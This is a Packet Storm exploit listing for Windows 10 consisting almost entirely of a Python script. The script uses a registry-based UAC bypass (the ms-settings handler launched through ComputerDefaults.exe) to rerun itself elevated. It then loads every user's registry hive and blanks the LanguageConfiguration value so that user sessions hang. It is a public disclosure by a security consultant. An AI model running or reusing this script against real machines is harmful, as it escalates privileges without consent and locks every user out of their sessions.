Microsoft Windows 10 User Sessions Stuck

2018-10-30T00:00:00
ID PACKETSTORM:150120
Type packetstorm
Reporter Fabien Dromas
Modified 2018-10-30T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#  
# Exploit Title: Windows 10 All Users Session Stuck  
# Date: 2018-10-24  
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>  
# Twitter: st0rnpentest  
#   
# After microsoft's refusal to consider the issue as a security problem, I disclose the script   
# Vendor Homepage: www.microsoft.com  
# Version: Version 10.0.17134.345  
# Tested on: Windows 10 pro Version 10.0.17134.345  
#  
  
from os import listdir, system, path  
from ctypes import *  
import _winreg  
  
def create_reg_key(key, value):  
try:   
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')  
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)   
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)   
_winreg.CloseKey(registry_key)  
except WindowsError:   
raise  
  
def exec_bypass_uac(cmd):  
try:  
create_reg_key('DelegateExecute', '')  
create_reg_key(None, cmd)   
except WindowsError:  
raise  
  
def bypass_uac():   
try:   
current=path.dirname(path.realpath(__file__)) + '\\' + __file__  
cmd="C:\windows\System32\cmd.exe /k c:\python27\python %s" %current  
exec_bypass_uac(cmd)   
system(r'C:\windows\system32\ComputerDefaults.exe')   
return 1   
except WindowsError:  
sys.exit(1)   
  
def modify_reg_key(key, value):  
try:   
registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)   
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)   
_winreg.CloseKey(registry_key)  
except WindowsError:   
raise  
  
  
def modify_reg_key_Others(key, value):  
try:   
registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00t\Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)   
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)   
_winreg.CloseKey(registry_key)  
except WindowsError:   
raise   
  
if __name__ == '__main__':  
try:  
sys32="c:\\windows\\system32\\"  
users="c:\\users\\"  
exclude=["Public", "desktop.ini", "All Users"]  
  
# Modify all users  
if windll.Shell32.IsUserAnAdmin():  
for i in listdir(users):  
if i not in exclude:  
system("reg.exe LOAD HKU\w00t "+users+i+"\NTUSER.DAT")  
modify_reg_key_Others('', '')  
system("reg.exe UNLOAD HKU\w00t")  
  
# Modify current user   
modify_reg_key('', '')   
else:   
bypass_uac()  
except WindowsError:  
raise   
`